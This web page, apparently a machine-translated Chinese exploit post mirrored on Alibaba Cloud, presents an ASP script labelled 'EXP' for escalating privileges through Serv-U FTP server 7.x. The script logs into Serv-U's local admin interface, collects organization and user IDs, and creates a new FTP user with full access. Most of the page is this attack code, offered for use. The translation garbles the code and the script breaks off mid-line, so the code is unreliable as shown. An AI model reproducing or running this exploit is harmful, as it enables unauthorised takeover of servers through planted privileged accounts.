Home > Cloud Computing > Cloud Security

Support Elevation of Privilege in asp version of serv-u 7.x

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

Tools

The idea is to follow the empty prodigal heart (http://www.inbreak.net /? Action = show & id = 134). Because asp does not support socket operations, you can only create a new domain and delete it. the program interface is plagiarized with Lu Da's serv-u 6. X Echo program, hey. because I can't find out how the userid of serv-u 7.0 changes, so I only deleted the domain ......
The reason why serv-u 7.4 cannot be connected is found out. It turns out that after the domain is added in Versions later than 7.0, it will be delayed for a period of time before it starts. the original exp can be used normally. for your convenience, I added a sentence and offered it again.
 

EXP:

<Style type = "text/css">
<! --
Body, td, th {
Font-size: 12px;
}
-->
</Style>
<%
Function httpopen (neirong, fangshi, dizhi, refer, cookie)
Set Http = server. createobject ("Microsoft. XMLHTTP ")
Http. open fangshi, dizhi, false
Http. setrequestheader "Referer", refer
Http. setrequestheader "Content-type", "application/x-www-form-urlencoded"
Http. setrequestheader "Content-length", len (neirong)
Http. setrequestheader "User-Agent", "Serv-U"
Http. setrequestheader "x-user-agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1;. net clr 1.1.4322 )"
If cookie <> "then
Http. setrequestheader "Cookie", cookie
End If
Http. send neirong
Httpopen = bytes2BSTR (Http. responseBody)
Set Http = nothing
End Function

Function getmidstr (L, R, str)
Int_left = instr (str, L)
Int_right = instr (str, R)
If int_left> 0 and int_right> 0 Then
Getmidstr = mid (str, int_left + len (L), int_right-int_left-len (L ))
Else
Getmidstr = "The executed string does not contain" & L & "" or "& R &"""
End If
End Function

Function bytes2BSTR (vIn)
StrReturn = ""
For I = 1 To LenB (vIn)
ThisCharCode = AscB (MidB (vIn, I, 1 ))
If ThisCharCode <& H80 Then
StrReturn = strReturn & Chr (ThisCharCode)
Else
NextCharCode = AscB (MidB (vIn, I + 1, 1 ))
StrReturn = strReturn & Chr (CLng (ThisCharCode) * & H100 + CInt (NextCharCode ))
I = I + 1
End If
Next
Bytes2BSTR = strReturn
End Function
%>
<%
---------- Start with custom parameter -----------
 
Action = Request ("action ")
Loginpass = Request. Form ("loginpass ")
Port = Request ("port ")
Mydomain = Request. Form ("mydomain ")
Path = Request. Form ("path ")
Ftpport = Request. Form ("ftpport ")
User = Request. Form ("user ")
Pass = Request. Form ("pass ")
Cmd = Request. Form ("cmd ")
Sessionid = Request ("sessionid ")
OrganizationId = Request ("OrganizationId ")
Userid = Request ("userid ")
Domainid = Request ("domainid ")

---------- Custom parameter end -----------

Select case action
 
Case 1
Returns = httpopen ("user = & pword =" & loginpass & "& language = zh % 2CCN % 26", "POST", "http: // 127.0.0.1: "& port &"/Web % 20 Client/Login. xml? Command = Login & Sync = 1543543543543543 "," http: // 127.0.0.1: "& port &"/? Session = 39893 & Language = zh, CN & LocalAdmin = 1 ","")
Sessionid = getmidstr ("<sessionid>", "</sessionid>", returns)
If sessionid <> "then
Response. Write "login OK! "&" </Br>"
Response. redirect "? Action = 2 & sessionid = "& sessionid &" & port = "& port
Else
Response. Write "error! "&" </Br>"
End if
 
Case 2
Call main2 ()
 
Case 3
Returns = httpopen ("", "POST", "http: // 127.0.0.1:" & port & "/Admin/ServerUsers.htm? Page = 1 "," ", sessionid)
OrganizationIdTemp = mid (returns, instr (returns, "OrganizationUsers. xml & ID ="), len ("OrganizationUsers. xml & ID =") + 15)
OrganizationId = mid (OrganizationIdTemp, instr (OrganizationIdTemp, "=") + 1, instr (OrganizationIdTemp, ")-instr (OrganizationIdTemp," = ")-1)
If OrganizationId <> "" then
Response. write "get OrganizationId" & OrganizationId & "OK! "&" </Br>"
Response. redirect "? Action = 4 & sessionid = "& sessionid &" & port = "& port &" & OrganizationId = "& OrganizationId
Else
Response. write "error! "&" </Br>"
End if
Case 4
Call main3 ()
Case 5
Returns = httpopen ("", "POST", "http: // 127.0.0.1:" & port & "/Admin/XML/User. xml? Command = AddObject & Object = COrganization. "& OrganizationId &". User & Temp =

1 & Sync = 546666666666666663 "," http: // 127.0.0.1: "& port &"/Admin/ServerUsers.htm? Page = 1 ", sessionid)
Userid = getmidstr ("<var name =" "ObjectID" "val =", ""/> ", returns)
If userid <> "then
Response. write "get userid" & userid & "OK! "&" </Br>"
Response. redirect "? Action = 6 & sessionid = "& sessionid &" & port = "& port &" & OrganizationId = "& OrganizationId &" & userid = "& userid
Else
Response. write "error! "
End if

Case 6
Call main4 ()
 
Case 7
Returns = httpopen ("LoginID =" & user & "& FullName = & Password =" & pass & "& ComboPasswordType = % E5 % B8 % B8 % E8 % A7 % 84% E5 % AF % 86% E7 % A0 % 81 & PasswordType = 0 & ComboAdminType = % E6 % 97% A0 % E6 % 9D % 83% E9 % 99% 90 & AdminType = & ComboHomeDir = % 2F "& path & "& HomeDir = % 2F" & path & "& ComboType = % E6 % B0 % B8 % E4 % B9 % 85% E5 % B8 % 90% E6 % 88% B7 & Type = 0 & ExpiresOn = 0 & ComboWebClientStartupMode = % E6 % 8F % 90% E7 % A4 % BA % E7 % 94% A8 % E6 % 88% B7 % E4 % BD % BF % E7 % 94% A8 % E4 % BD % 95% E7 % A7 % 8D % E5 % AE % A2 % E6 % 88% B7 % E7 % AB % AF & WebClientStartupMode = & LockInHomeDir = 0 & Enabled = 1 &

AlwaysAllowLogin = 1 & Description = & export derespcodesinmsgfiles = & ComboSignOnMessageFilePath =

& SignOnMessageFilePath = & SignOnMessage = & SignOnMessageText = & ComboLimitType = % E8 % BF % 9E % E6 % 8E % A5 & LimitType = Connection & QuotaBytes = 0 & Quota = 0 & Access = 7999 & amp; MaxSize = 0 & Dir = % 25 HOME % 25 ", "POST", "http: // 127.0.0.1:" & port & "/Admin/XML/Result. xml? Command = UpdateObject & Object = COrganization. "& OrganizationId &". User. "& userid &" & Sync =

1227071190250 "," http: // 127.0.0.1: "& port &"/Admin/ServerUsers.htm? Page = 1 ", sessionid)
Response. write "add user OK! "&" </Br>"
Response. redirect "? Action = 8 & userid = "& userid &" & port = "& port &" & sessionid = "& sessionid &" & OrganizationId = "& OrganizationId
 
Case 8
Call main5 ()

Case 9
Returns = httpopen ("Access = 7999 & MaxSize = 0 & Dir = % 2F" & path & "& undefined = undefined", "POST", "http: // 127.0.0.1: "& port &"/Admin/XML/Result. xml? Command = AddObject & Object = CUser. "& userid &". DirAccess & Sync = 1227081437828 "," http: // 127.0.0.1: "& port &"/

Admin/

ServerUsers.htm? Page = 1 ", sessionid)
Response. write "add user power OK! "&" </Br>"
Response. redirect "? Action = 10 & userid = "& userid &" & port = "& port &" & sessionid = "& sessionid &" & OrganizationId = "& Organizati

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
definition of session in asp net full form of soap in asp net version of latest version of spring framework in java features of asp net meaning of asp net ibm os 7 1 end of support
Related Article
How does personal cloud security guarantee data security?
Cloud security to achieve effective prevention of the future ...
Focus on three major cloud security areas, you know?
Decrypting Cisco type 5 password hashes
Using redis to write webshell

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More